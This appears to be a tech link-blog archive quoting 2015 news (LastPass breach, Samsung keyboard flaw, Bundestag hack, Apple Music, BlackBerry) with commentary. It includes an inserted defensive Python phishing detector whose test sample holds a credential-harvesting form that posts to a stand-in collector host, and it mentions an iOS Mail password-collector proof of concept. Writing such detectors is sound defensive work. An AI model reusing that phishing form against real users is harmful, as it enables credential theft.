Scigala said over the past two months, with Greece locked in talks with its creditors, the company had seen a 124% pick-up in inflows from Greek IP addresses – numerical labels that identify computers and other internet-enabled devices.

124% = doubling. Which doesn’t amount to much, really, unless Greece was already a lot of business. Here’s the problem with this story. To buy bitcoin, you have to sell the euros to someone. If Greeks are withdrawing their euros from banks, why not hold on to those euros instead of buying bitcoin with them? Do they really think a post-Grexit euro will be worth less, rather than more? I’d bet on the latter.

There may be some Greek euros moving into bitcoin, which is moving bitcoin – but that only indicates that bitcoin has low liquidity, and so small amounts of money can move the value easily. Or else it’s something else altogether causing it.


Critics due to get EU’s Google antitrust charge sheet this week: sources » Reuters

Foo Yun Chee:

Microsoft, German publisher Axel Springer and 17 other critics of Google are expected to get a copy of the EU’s antitrust charge sheet against the search engine giant this week in order to allow them to provide feedback, four people familiar with the matter said on Tuesday.

The 19 companies, which include U.S. online travel site Expedia, U.S. consumer reviews website Yelp, online mapping service Hot-map and British price comparison site Foundem, helped trigger the European Commission’s case against Google nearly five years ago…

…Google has until July 7 to respond to the accusations. This can be extended on request. It can also seek a closed-door hearing to argue its case before a broad audience of antitrust officials and the critics.

The complainants were told on Monday to sign confidentiality waivers not to disclose the so-called statement of objections to journalists or public affairs consultants before they could get a copy of the redacted document, according to a Commission letter seen by Reuters.

The critics were told to restrict the charge sheet to their lawyers and economists.

Leaks in 3,2,1… And there’s Andrew Orlowski’s writeup of the Foundem examination into Google’s “search for harm” blogpost.


One tiny number can reveal big problems at a global smartphone maker » Bloomberg Business

Tim Culpan:

Tucked away in a corporate earnings report—past the data on profit margins and revenue growth, hidden deep inside a balance sheet—is a number that can tell you a lot about a mobile phone maker’s health. In the global smartphone war, brands are routinely measured by market share, revenue, profit, and the coolness of their ads. But one line item called finished goods inventory, which refers to the percentage of materials that were manufactured into phones but went unsold, can give insight into whether a company’s fortunes are changing.

The latest company to let phones pile up in warehouses and on store shelves is HTC. The Taiwanese company’s stock just fell to its lowest point in a decade after lowering its sales forecast on June 5 and announcing a NT$2.9 billion ($93 million) writedown, though it’s recovered some of that loss amid speculation the decline could make it a buyout target. HTC’s finished goods inventory had climbed to a record high 2.35% of total assets at the end of last quarter. During the company’s heyday, that figure rarely nudged above 1%.

Culpan has done a neat job, building on what I pointed out last week about HTC’s broader inventory numbers. Relating inventory to total assets is an effective way to look at it; here’s the graph.

HTC inventory as percent of assets
So now it’s higher than ever before. Finished goods inventory is going to be one of the first numbers people look at when the Q2 figures are published (in late July, probably).


Merkel’s PC was the first one infected in the Bundestag hack » Security Affairs

I have written many posts regarding a recent attack against the German Bundestag which caused a major data breach.

We discussed the possibility that the cyber attack against the German Parliament was coordinated by Russian state-sponsored hackers that spread a highly sophisticated malware inside the network of the Bundestag.

The consequence of the data breach could be serious for the German Government: German media state that the Bundestag may need to replace 20,000 computers after the intrusion, an operation that could cost millions of euros.

New revelations in the investigation confirm that the cyber attack on the German Bundestag began with the compromise of Chancellor Angela Merkel’s personal computer.

Her phone by the NSA, her computer by Russia…


Flaw lingers in Samsung phones, illustrating hacking risk » WSJ

Danny Yadron:

Last fall, researchers at cybersecurity firm NowSecure found a bug in most Samsung smartphones that could allow hackers to spy on users.

In March, Samsung told NowSecure it had sent a fix to wireless carriers that they could distribute to users. It asked NowSecure to wait three months before going public.

Last week, the researchers bought two new Samsung Galaxy S6’s from Verizon Wireless and Sprint. They found both were still vulnerable to the security hole, which involves how the phone accepts data when updating keyboard software.

NowSecure CEO Andrew Hoog shared his version of events with The Wall Street Journal as his company prepared to release its research Tuesday. The story helps illuminate why hacking is so hard to stamp out.

That’s particularly true in smartphones, with its diffuse system of device makers, software programmers and network operators. Things likely are only to get worse as Americans connect their thermostats, door locks and cars to the Internet and face the need to update their software…

…Welton found he could hijack the process of updating one of the virtual keyboards Samsung installs on many Android smartphones. From there, he could eavesdrop on phone conversations, rummage through text messages and contacts, or turn on the microphone to capture audio.

That was possible, Hoog said, because Samsung didn’t encrypt the update process.

It’s the IOT vulnerability that’s the real worry here, much more than which make of phone is involved. Except that Samsung asked NowSecure for a year to fix the bug – a month after it was told about it. And what does this mean for Google’s “we find a bug and we publicise it in 90 days” stance?


Nokia faces lengthy arbitration over LG patent royalty payments » Reuters

Jussi Rosendahl:

Nokia said the arbitration with LG is expected to conclude within two years. Shares in Nokia rose 1.4 percent by 1204 GMT (8.04 a.m ET).

“This is becoming a more and more common model. The companies won’t go to the court but instead let an independent party decide,” said Nordea analyst Sami Sarkamies.

He estimated that the Samsung deal, expected to conclude later this year, could eventually mean Nokia receives 100-200 million euros of additional royalty payments annually, on top of retroactive payments.

Seems to be related to 4G patents; Nokia signed a similar deal with Samsung a while back. For LG, it means that profitability in the smartphone side becomes that little bit more elusive – especially after the back payment.


Apple News curation will have human editors and that will raise important questions » 9to5Mac

Jordan Kahn:

Techmeme‘s founder Gabe Rivera gave us the hard truth on why being an algorithm-based service like Google News doesn’t make sense for the Apple News app saying, “All news aggregators intended for the mass market need editors, so this makes sense for Apple.” But the flip side of Apple’s human-based curation is that without a separation of editorial and the business, there will undoubtedly be conflicts of interest. Rivera points out that “…as the world’s most valuable corporation, they can’t and shouldn’t be trusted to present well-rounded coverage on many important topics.” Rivera continues, “But most readers won’t care about that.”

Apple doesn’t want this to be an algorithm thing, because (a) algorithms might not pull outré-yet-fascinating stuff to the surface (b) if some story that were grisly/violent/sexual – pick the topic you think Americans in particular would react in horror to – popped up, Apple would of course get the blame. Apple hates that.

So it wants humans on hand to stop the Bad Stuff that will Offend People finding its way into the app. But that immediately raises the question: what will it define as Bad Stuff? Are Mark Gurman’s well-sourced leaks of Apple plans Bad Stuff? Is vicious criticism of Apple?

I suspect people are overplaying this; Apple is really wary of consumer backlashes over pr0n. Look at how Facebook struggles with the same topic, and the issue of content posted by millions of people which some find offensive and others really don’t.

No simple answer, but Apple may not have realised it was putting itself in the position of a publisher.


Start up: LastPass’s warning, Google tracks down racists, HTC snubs Asus, valuing maps, and more


Health risk? An LED bulb sign board. Photo by Patrick Hoesly on Flickr.

A selection of 9 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Competition and Partisanship » ignore the code

Lukas Mathis:

I wish we’d see even more competition! I wish Samsung would get serious with its own OS. I wish HP would revive Web OS. I wish Blackberry would stop making bad decisions, and start kicking ass again. I wish smaller companies like Jolla, Ubuntu, and the Firefox OS team would be better able to compete with the big guys. I wish Microsoft would get more credit for the progress it has made in UI design, instead of just getting crap for changing things from how they were in Windows 95. And I wish people would look outside of the confines of their chosen platform, and acknowledge the positive contributions that other companies are making. Get out of your bubbles! Other systems are great and interesting and useful, too!

The problem with this view, happy as it is, is that there’s a cognitive load associated with learning a new OS, and the cognitive load grows geometrically the more OSs you have to work on.


LastPass Security Notice » The LastPass Blog

Joe Siegrist:

We want to notify our community that on Friday, our team discovered and blocked suspicious activity on our network. In our investigation, we have found no evidence that encrypted user vault data was taken, nor that LastPass user accounts were accessed. The investigation has shown, however, that LastPass account email addresses, password reminders, server per user salts, and authentication hashes were compromised.

We are confident that our encryption measures are sufficient to protect the vast majority of users. LastPass strengthens the authentication hash with a random salt and 100,000 rounds of server-side PBKDF2-SHA256, in addition to the rounds performed client-side.

That’s grea– hang on, “vast majority” of users?
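The layered hashing the notice describes can be sketched as follows. This is an added example, not LastPass's code: the client-side round count, the use of the email address as the client salt, the record layout and all function names are assumptions; only the 100,000 server-side PBKDF2-SHA256 rounds and the random per-user salt come from the notice.

```python
import hashlib
import hmac
import os

CLIENT_ROUNDS = 5_000    # assumption: the notice does not give the client-side count
SERVER_ROUNDS = 100_000  # figure quoted in the notice
SALT_BYTES = 16          # assumption: size of the random per-user server salt


def client_login_hash(email: str, master_password: str,
                      rounds: int = CLIENT_ROUNDS) -> bytes:
    """Runs on the user's device, so the master password itself is never sent.

    Assumption: the normalised email address serves as the client-side salt.
    """
    salt = email.strip().lower().encode("utf-8")
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                               salt, rounds)


def server_enroll(login_hash: bytes, rounds: int = SERVER_ROUNDS) -> dict:
    """Strengthen the client's hash again before it is written to storage.

    The salt and round count are stored beside the hash, which is why a
    breach of this table exposes "salts and authentication hashes" together.
    """
    salt = os.urandom(SALT_BYTES)
    stored = hashlib.pbkdf2_hmac("sha256", login_hash, salt, rounds)
    return {"salt": salt.hex(), "rounds": rounds, "hash": stored.hex()}


def server_verify(record: dict, login_hash: bytes) -> bool:
    """Recompute with the stored parameters and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", login_hash,
                                    bytes.fromhex(record["salt"]),
                                    record["rounds"])
    return hmac.compare_digest(candidate, bytes.fromhex(record["hash"]))


def login(record: dict, login_hash: bytes,
          policy_rounds: int = SERVER_ROUNDS):
    """Return (ok, record). A successful login on a record below the current
    policy is re-enrolled with a fresh salt and the current round count."""
    if not server_verify(record, login_hash):
        return False, record
    if record["rounds"] < policy_rounds:
        record = server_enroll(login_hash, policy_rounds)
    return True, record


if __name__ == "__main__":
    # Constructed sample account, not real data.
    h = client_login_hash("alice@example.com", "correct horse battery staple")
    rec = server_enroll(h)
    print("stored record:", rec)
    print("verifies:", server_verify(rec, h))
```

Because every record has its own random salt, two users with the same master password get different stored hashes, and each guess against a leaked record costs the client rounds plus the server rounds.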


Do lightbulbs need a health warning label? » Consumer Reports

Consumer Reports’ medical experts say that studies have shown that exposure to light at night is clearly associated with an increased risk of sleep problems as well as mood disorders. Additional research has linked light at night with an increased risk of breast cancer, obesity, type 2 diabetes, and cardiovascular disease; however, much more research remains to be done to determine just how significant that risk may be.

So, why single out LEDs? LEDs do emit more blue light than CFLs, and incandescents emit very little. And while any light can suppress melatonin, the hormone that facilitates sleep, research has shown that human eyes are especially sensitive to blue (which is also emitted in higher levels by most of today’s indispensable electronic devices).

Fred Maxik, founder and chief technology officer of Lighting Science, says that in contrast to the older incandescent bulbs, LEDs and CFLs have significantly changed the impact light has on human health, affecting our circadian rhythms. He believes the effects can be beneficial, such as promoting alertness or enabling natural sleep hormones to be released. But “there’s a growing amount of evidence that light can also have negative biological effects,” he says. And that’s why the company created the label. Maxik is also encouraging other lighting manufacturers to make consumers aware of the effects of light on health.

Lighting Science has hired former U.S. Secretary of Health and Human Services, Louis W. Sullivan, M.D., as a consultant. “The fact is that the wrong kind of light can be disruptive on sleep patterns,” he says. “I think this label gives interesting information to the public so they can decide, particularly for people with sleep problems.”

Short answer: no, unless you’re an American.


Use Google searches to figure out how racist your neighbourhood is » Gizmodo

Annalee Newitz:

What [data scientist Seth] Stephens-Davidowitz ultimately discovered was that racism “appears to have cost Obama roughly four percentage points of the national popular vote in both 2008 and 2012.” He determined this by showing that the higher the number of searches there were on “nigger” in a given area, the more likely it was that Obama lost votes there — even controlling for things like income, already-existing political affiliations, and more. In other words, even in an area where people typically voted for Democrats, you’d see a less-than-typical number of votes for Obama if the rate of Google searches on “nigger” was higher than average. As Stephens-Davidowitz put it, “An area’s racially charged search rate is a robust negative predictor of Obama’s vote share.”


Campbell’s law, Goodhart’s law, and the trouble with observation » mmitII

Matt Ballantine pointed me back to this observation of his from 2012, following the article I linked the other day about how most mobile benchmarks aren’t much use:

Charles Goodhart is an economist from the London School of Economics, and a former member of the Bank of England’s Monetary Policy Committee.

The law named after him was first noted in a paper he published in 1975, and states:

“that once a social or economic indicator or other surrogate measure is made a target for the purpose of conducting social or economic policy, then it will lose the information content that would qualify it to play that role.”

And if you use benchmarks to try to value a phone (or PC) they’ll be gamed and become worthless.


BlackBerry: an Android phone won’t move the needle » Seeking Alpha

Zenith Investments:

So what can BlackBerry bring to the table so that they can make a profit from an Android smartphone if it can’t bring security? The sources spilling the beans on BlackBerry’s potential Android phone also indicated that they plan to differentiate their phone with a physical keyboard. Again I see the argument – this should appeal to the hardcore BlackBerry fans who had to switch to Android because of the added apps. The problem is that this was tried before – with the Motorola Droid Pro. It was an Android phone that was equipped with a physical keyboard, but it suffered from very low sales. The problem seems to be that the people, who desperately want a physical keyboard, also want the BlackBerry operating system.

That’s pretty much it. Seeking Alpha is a site where you can find any opinion that suits you, but this one on the “Android BlackBerry” is at least realistic about why people buy the phones. I’m forecasting an operating loss of about $20m in the just-gone quarter.


To clarify the news on Asustek will not rule out the possibility of acquiring HTC Corp » HTC

HTC’s formal announcement to the Taiwanese stock exchange on Monday:

We didn’t contact Asusteck and will not consider the acquisition. As an international brand, HTC will continue to design world-class innovative smart devices through its pursuit of brilliance brand promise.

Let’s put a marker down on that one.


Where are Maps going? » Asymco

Horace Dediu, using Apple’s data points about map requests per week:

In December 2012 I posted an analysis on the cost of maps. It showed that maintaining maps requires an investment of between $1 billion and $2 billion/yr. With the addition of new features such as 3-D mapping, transit maps and thousands of new cities, the cost is likely to have increased. $2 billion/yr is probably the norm today.

Apple then could be seen as spending about $6.5/user/yr on maps and Google could be spending about $2/user/yr. To be profitable Google would need to find ad revenues of $2/user/yr and Apple would need to find $6 of profit on each phone/yr. Clearly, each of these targets is achievable.

In contrast we can see why Nokia’s HERE Maps business is now worth a lot less than it was in 2007. The asset has been for sale for some time and the latest bid has been for $3 billion, making the $5 billion lost in market value and $7 billion of investment since seem like a catastrophe. Without a business model the data is worthless – with only 30 million users the cost per user reaches $66/yr. A buyer needs to find an appropriate model for sustaining a $2 billion/yr burn rate.

So the question of where maps are going depends on the business model for maps.

The point about the loss in value of HERE is well made.


Apple Music vs. Spotify: don’t repeat Bob Lefsetz’s mistake » Medium

Lefsetz, you’ll recall, was hugely dismissive of Apple Music. Michael Vakulenko thinks it is a different play altogether – a platform play in a different world of music:

Apple Music is more than a differently-packaged version of Spotify. Google AdWords is more than a less-expensive advertising agency, iOS is more than a nicer-looking version of Symbian, Uber is more than a digital version of a Taxicab stand, AirBnB is more than renting mattresses to strangers and Munchery is more than a bigger restaurant kitchen. These are platforms having very different economics from traditional products. As Marshall Van Alstyne said: “Platforms beat products every time.”

Platforms disrupt industry after industry: telecom, computing, watches, automotive, consumer electronics, banking, education, food, transportation, hospitality, healthcare, and more. When you see a new idea in the market or a new competitor, ask yourself: “Is it a market-creating platform?” and “What will it mean for my business if the platform reaches critical mass?”


Start up: Apple’s Sonos rival?, Nokia’s smartwatch, three-ton Twitter, Netscape in the NHS, and more


Sunday Times sourcing? Photo by DrJohn2005 on Flickr

A selection of 8 links for you. Why not? I’m charlesarthur on Twitter. Observations and links welcome.

Apple Music’s missing link: how Beats Electronics fumbled its Sonos killer (EXCLUSIVE) » Variety

Janko Roettgers:

Beats was looking to build a premium product that would mimic and compete with wireless speakers produced by Sonos. Like Sonos, Beats wanted to give consumers the option to place speakers in multiple rooms of their house, and then have them all play the same music synchronously. And like Sonos, Beats was looking to introduce a bigger, more powerful speaker for the living room first, and then follow up with a smaller, more affordable product for the kitchen and bedroom.

However, Beats wasn’t just looking to copy Sonos. The company was also working on combining Bluetooth with Wifi and NFC to allow for seamless handovers, effectively making it possible to launch music playback as soon as you’d enter the room, said a source familiar with technical details of the project. And thanks to its premium brand, Beats wasn’t looking to undercut Sonos — quite the contrary: Word has it the company was looking to sell its bigger Wifi speaker for as much as $750.

1) wouldn’t have been a Sonos killer
2) this is utterly random, but my next-door neighbour works in the (legal) pharma industry, and four months ago told me the story of going to a party in San Diego where “people from Apple” were talking about exactly this device. So I’m inclined to believe it, weirdly. Also, my neighbour’s reaction: “I said, so you’ve reinvented the boombox?” Probably why it was canned.


Apple’s WWDC keynote: issues with structure, approach, direction » Mobile Forward

Hristo Daniel Ushev on the messy Apple WWDC keynote:

Ultimately, the issues above are symptoms of weak (or hand-cuffed) direction. Not just in the form of what to do (e.g., don’t have Eddy Cue focus on the app) but also in terms of what not to do – i.e., editing. Editing in this context: shortening the list of presenters, directing them to use fewer slides (at one point, they flashed by like pages in a flip book), and saying no to distracting uses of humor and movement. When viewed through this lens, I think this keynote lacked a director. Or at least one that could effectively influence the senior executives and the choices they made. (Believe me, I’m not saying any of this is easy.)

Will all this impact the products’ success? Not directly. Indirectly, however, key influencers of consumers (developers, fans, and journalists) may get a fuzzier picture of Apple’s intent or advantage.

The music segment was terrible. The rest, fine.


Sunday Times Snowden story is journalism at its worst » The Intercept

Glenn Greenwald on the Sunday Times’s story – its front-page lead (aka “splash”) claiming that UK intelligence agencies “had to move” agents and that Russia and China “had cracked” the files (here’s text of the print version; try reading it first):

how could these hidden British officials possibly know that China and Russia learned things from the Snowden files as opposed to all the other hacking and spying those countries do? Moreover, as pointed out last night by my colleague Ryan Gallagher – who has worked for well over a year with the full Snowden archive – “I’ve reviewed the Snowden documents and I’ve never seen anything in there naming active MI6 agents.” He also said: “I’ve seen nothing in the region of 1m documents in the Snowden archive, so I don’t know where that number has come from.”

Greenwald is furious, and rightly so. The Sunday Times story is clearly hung on a single quote from a UK intelligence agency source, but one which doesn’t support the story’s claims. The Snowden archive is vast, but putting a number on it is surprisingly difficult, because it has interrelated files – there’s an almost wiki-like quality to some parts.

Given that the UK (and US) intelligence agencies don’t claim to know what’s in the Snowden files, they can’t know what the Russians or Chinese know from it – if for the sake of credulity we believe that the Russians and Chinese have cracked the encryption, which I seriously doubt.

When I used to work Sunday shifts as a news reporter at The Independent, I often had to “follow up” stories that appeared in the Sunday Times. The problem was, as soon as you began trying to establish the facts they claimed, the stories fell apart – the claims didn’t match reality. This is another example, although that hasn’t stopped the BBC repeating it (though an analysis by Gordon Corera in the middle of this straight-up followup rather backs away from the Sunday Times claims).


Microsoft Moonraker was Nokia’s smartwatch before it was killed » The Verge

Tom Warren:

Nokia’s Moonraker smartwatch never made it to market primarily because Microsoft was anticipating its wearable Band. While the Moonraker had a number of sensors to allow you to lift your arm to read texts or drop it to turn off the display, Microsoft opted for the Band as it had more functionality. Nokia took the familiar “Metro” interface from Windows Phone and paired it with simple email, phone, and messaging apps on its smartwatch. There was even a camera remote feature to take pictures on a smartphone from the watch. Facebook and MixRadio integration was also built-in, alongside customizable watch faces and different colored straps.

It’s unlikely that the “Moonraker” will ever make it to the market, but given time Microsoft may want to bring some of the more fashion-related aspects of it over to the Band in the future. Microsoft is now working on the second generation of its Band. While the software platform on the upcoming Microsoft Band 2 will remain largely the same, the look and feel of the device will improve. Microsoft is expected to launch its next-generation Band later this year after Windows 10 is available broadly.

The UI looks unfinished in the photos. And would it have worked only with Windows Phone? If so, it was dead already.


The Twitter of the three-ton nail » Medium

Zeynep Tufekci on Twitter’s “metric-driven” approach to please Wall Street:

if you set up an absurd game, as Wall Street often does, ruled by the incentives of those who set the rules (their quarterly bonus calculations depend on chasing growth for the sake of growth), people will, naturally, game the system and produce the results you want, just as absurdly.

At the moment, sadly, Wall Street is not solely a representative of market dynamics, but also a collective madness imposed upon us by the distorted over-accumulation of capital in the hands of too-few people. This “elite failure” has repercussions beyond my beloved platform: from global warming to revving up global growth (you can’t grow demand if people don’t make money) but in a sustainable manner (because the annual bonus is not the right time-frame). We are paying the price for having surrendered our economy to a game that is not about some independent logic of the market, but the absurdity of accumulating more zeroes in a bank account (which you cannot spend in any reasonable lifetime).

If you’re not following @zeynep, you should. She’s so incisive.


Misunderstood or inappropriate mobile benchmarks are hurting the industry and consumers » Forbes

Patrick Moorhead:

Because of the creation, use and promotion of these inaccurate, misunderstood, and/or gameable benchmarks, we are seeing smartphone manufacturers and SoC vendors dedicating time and engineering resources to ensuring that their performance in these benchmarks is up to expectations. After all, if so many people are using or mischaracterizing AnTuTu and Geekbench, it lends them credibility even when it shouldn’t.

Or vendors are adding features that make the misrepresentative benchmarks look better, like by adding more CPU cores beyond what any piece of software can use to improve the experience outside of battery life.

Additionally, because so many reputable tech blogs don’t run ANY benchmarks at all, they are essentially giving the ones that do more credibility when they show AnTuTu and other benchmarks.

I trust Anandtech (as does Moorhead), but most other benchmarks strike me as crap because they tell you nothing about experience. Google’s Project Butter (smoother scrolling), Project Volta (longer battery life) and the focus in Android M on standby life tell us that benchmarks tell you barely anything about real-life use.


Exclusive: BlackBerry may put Android system on new device: sources » Reuters

Euan Rocha:

BlackBerry is considering equipping an upcoming smartphone with Google’s Android software for the first time, an acknowledgement that its revamped line of devices has failed to win mass appeal, according to four sources familiar with the matter.

The move would be an about-face for the Waterloo, Ontario-based company, which had shunned Android in a bet that its BlackBerry 10 line of phones would be able to claw back market share lost to Apple’s iPhone and a slew of devices powered by Android.

The sources, who asked not to be named as they have not been authorized to discuss the matter publicly, said the move to use Android is part of BlackBerry’s strategy to pivot to focus on software and device management. BlackBerry, which once dominated smartphone sales, now has a market share of less than 1%.

Rocha is based in Toronto. I’d trust his sources. Can’t see why BlackBerry thinks this is a good idea though. It’s losing money on handsets; this would be a way to get commoditised out of the solar system, and lose its faithful buyers too.


NHS browser statistics » LinkedIn

Mark Reynolds:

Have you wondered what technology the NHS uses? We gather anonymous statistics on those using NHSmail and so have a good picture of technology across healthcare in England and Scotland.

88% of users access the service via Windows, with 8% on Macs and 3% on Linux. Amazingly we have a user browsing NHSmail using their Wii, which suggests dedication to the cause or spoofing the browser data. 65% of users are on Windows 7, followed by XP (20%) and Vista (3%). Windows 8 usage is too low to register. 

Microsoft Internet Explorer dominates browser statistics at 73%, followed by Chrome (13%), Safari (7%), Mozilla (5%) and Firefox (2%). 0.9% of traffic comes from Netscape! Internet Explorer 7 and 8 account for 61% of the traffic, with IE 11 too low to register.

Two things: Netscape > Windows 8. Also: XP > Vista + Windows 8. That’s inertia.

Worth comparing with data.gov.uk stats for web browsing.


Start up: Oculus here!, when cashless fails, what Twitter needs now, EC’s ebook probe, and more


Musical toast? Photo by revedavion.com on Flickr.

A selection of 9 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

April 2015: Twitter needs new leadership » Stratechery

Ben Thompson nailed it months ago:

I believe it’s time for Twitter’s leadership, in particular CEO Dick Costolo, to make way for new leadership that has improved credibility with Wall Street, with developers, and within Twitter itself…

…Twitter would be better off retooling their API and developer agreements to ensure they are learning from every application they interact with, and in return sharing their graph along with advertising in the form of their MoPub or Namo Media-derived offerings. The advantage of this approach is that the imagination and ingenuity of a massive developer ecosystem will always be far faster and more innovative than anything any one company can do on its own — just ask Apple.

Worth reading (or re-reading). The accompanying podcast nails it too.


Apple Music » Lefsetz Letter

Bob Lefsetz has a typically nuanced take on Apple’s new offering:

It’s toast.

Its success was based upon eliminating free. But that positively non-techie entity known as the government put the kibosh on that. Now the labels and Apple are too scared to enact their plan of eliminating freemium. So while the techies leap ahead, creating solutions to problems we didn’t even know we had, those in the music business stay mired in the past, believing backroom dealings and brawn will get them what they want.

But it won’t in the new world.

What I find puzzling is that nobody at the record labels has heard of the Laffer curve.


Oculus teams up with Microsoft on Rift VR headset » FT.com

Tim Bradshaw:

Oculus faces mounting competition from Sony PlayStation’s Project Morpheus and games software maker Valve’s Vive headset, made by HTC. Google is also investing heavily in VR, after unveiling updates to its low-cost Cardboard headset last month, including its Jump 360-degree video system.

Oculus emphasised its headset’s ease of use and a familiar video-gaming content for its launch.

“It rests comfortably right on your brow,” Mr Iribe said of the Rift. “You’re going to put it on like a baseball cap. It’s going to be simple and easy . . . The goal is you put it on and it goes away, it disappears.”


Download Festival-goers left hungry as cashless system goes to Borksville » The Inquirer

Chris Merriman:

Festivalgoers are ready to throw a Five Finger Death Punch at organisers after a cashless society model involving digital currency failed.

The Download Festival at Castle Donington is completely cashless this year, and visitors are being issued with a dog-tag At the Gates.

However, the system for topping up the dog-tags with currency has failed, and there’s no back up, leaving many people complaining of being unable to eat or drink.

This is a huge embarrassment for cashless as the future of money in the week that Apple Pay was announced for the UK market.

Download proudly hailed itself as the first major festival to use RFID technology to replace cash, but the Utopian dream seems to have turned into a nightmare as festival goers are not only unable to eat, but face the prospect of seeing Slipknot sober.

Test, and then test. Then test it again. Then pull out something essential. Test.


Who’s afraid of DNS? Nominet’s ‘turing’ tool visualises hidden security threats » Techworld

John Dunn:

UK domain registry Nominet has shown off a striking new visualisation tool called ‘turing’ that large organisations can use to peer into their DNS traffic to trace latency issues and spot previously invisible botnets and malware.

In development for four years, and used internally by Nominet for the last two, at core turing is about representing DNS traffic in visual form, allowing administrators to ‘see’ patterns in real time that would normally be impossible to detect let alone understand.


EU opens investigation into Amazon’s e-book selling » Reuters

Julia Fioretti:

The investigation adds to the pressure on the online retailer in Europe, where it is already being investigated for the low tax rates it pays in Luxembourg.

The Commission said it would look in particular into certain clauses included in Amazon’s contracts with publishers.

These clauses, it said, required publishers to inform Amazon about more favorable or alternative terms offered to Amazon’s competitors, a means to ensure Amazon is offered terms at least as good as those of its competitors…

…“Amazon has developed a successful business that offers consumers a comprehensive service, including for e-books,” Competition Commissioner Margrethe Vestager said in a statement.

“Our investigation does not call that into question. However, it is my duty to make sure that Amazon’s arrangements with publishers are not harmful to consumers, by preventing other e-book distributors from innovating and competing effectively with Amazon.”

Similar in that sense to Apple’s bad action in the “most favoured nation” clause for ebooks it sought from publishers.


Google’s Android One may go down as an interesting idea that bombed » ETtech

Gulveen Aulakh:

Google’s first set of phone-making partners Micromax, Karbonn and Spice have no development roadmap for the platform’s next batch of devices. Some are clearing available stock at discounts, executives told ET. Intex, Lava and Xolo, which were to join the above three, no longer seem to be keen, leading some to question whether the search giant is planning to drop the Android One project altogether.

Google insisted it’s still committed to the product. “We’re not backing away from the programme,” Caesar Sengupta, vice president of product management at Google, told ET. “We’ve learnt a lot from the initial round with our partners and they have learnt in terms of device availability, in channel and others. Over time, as we work with our partners, we will keep working on making sure that we do things much better.” But with the products not doing too well, executives at the three partners said they weren’t working on the next lot of Android One devices.

The problem with Android One being that it tried to force a uniform experience – which left the OEMs no way to differentiate. Who benefits? Only Google.


jansoucek/iOS-Mail.app-inject-kit » GitHub

Jan Soucek:

Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.

It was filed under Radar #19479280 back in January 2015, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Here’s the Youtube video:

It uses a targeted email to capture the person’s iCloud password (if their iCloud email is the same email). The prime weakness is the way iOS 8 keeps popping up dialogs asking you to sign into the App Store. Secondary weakness may be loading images in Mail; I don’t know whether turning off “load images” guards against this.

Bad that it has taken Apple six months not to do anything for a potential targeted phishing attack.
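A mail-gateway check for the kind of message described above, as an added example (not code from this page or from the linked proof of concept): it walks a message's HTML parts and flags bodies that both ask for a password and reach out to a remote host. The tag list, the quarantine policy, the function names and the `example.invalid` sample messages are assumptions of this example; the page does not say which tag the bug concerns.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose src/data/href can pull in remote content (this example's choice).
REMOTE_TAGS = ("iframe", "frame", "object", "embed", "link", "img")

def _is_remote(url):
    return url.startswith("//") or urlparse(url).scheme in ("http", "https")

class MailHtmlAudit(HTMLParser):
    """Records constructs that fetch remote content or ask for a password."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-field", a.get("name", "")))
        elif tag == "form" and _is_remote(a.get("action", "")):
            self.findings.append(("remote-form-action", a["action"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag in REMOTE_TAGS:
            url = a.get("src") or a.get("data") or a.get("href") or ""
            if _is_remote(url):
                self.findings.append(("remote-load", url))

def audit_message(raw):
    """Return findings for every text/html part of a raw RFC 5322 message."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html":
            continue  # skips multipart containers and non-HTML parts
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, errors="replace")
        parser = MailHtmlAudit()
        parser.feed(html)
        findings.extend(parser.findings)
    return findings

def should_quarantine(findings):
    # Policy chosen for this example: a password prompt plus any remote reach.
    kinds = {kind for kind, _ in findings}
    remote = {"remote-form-action", "meta-refresh", "remote-load"}
    return "password-field" in kinds and bool(kinds & remote)

# Constructed sample messages (not taken from the page or the PoC).
SUSPECT = """\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<form action="https://collector.example.invalid/submit" method="post">
<input type="text" name="user"><input type="password" name="pw"></form>
--b1--
"""
BENIGN = """\
Content-Type: text/html; charset=utf-8

<p>Hello</p><img src="https://cdn.example.invalid/logo.png">
"""
if __name__ == "__main__":
    print([(should_quarantine(f), f) for f in map(audit_message, (SUSPECT, BENIGN))])
```

A remote image alone is reported but not quarantined, since ordinary newsletters load images; only the combination with a password field trips the policy.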


The mobile to machine learning era: privacy in the new age. » Praxtime

Nathan Taylor on Apple, privacy and machine learning:

there’s a risk that inside the company Apple could cripple their machine learning efforts by overcommitting to their own marketing and privacy ideology. I noticed Apple’s Phil Schiller was on message last night about privacy on John Gruber’s The Talk Show. It’s hard to be certain of Apple’s motivation here. It’s likely some mix of being out of touch with recent trends so being overly creeped out by machine learning, spinning their backwardness in cloud and machine learning in the best light, having some real and serious moral concerns about privacy, plus some very cynical distancing from Google. The latter since they know Google will be the one to bear the brunt of the lawsuits and tech regulations around privacy as machine learning explodes. And then Apple can follow serenely behind in their wake…

…What I noticed and liked about the Apple keynote at WWDC this week is Craig Federighi clearly loved all the new cool features based on machine learning and searching with natural language. He has an infectious enthusiasm. It’s great to see. Apple clearly takes machine learning very seriously. They just want to do it their own quirky and backhanded way.

The point about lawsuits and regulation is one I hadn’t seen raised before. But once it’s said, it feels inevitable.


Windows Phone, in five tweets

US installed base of smartphones

Data from ComScore of US installed base of smartphones

Don’t expect this situation to change.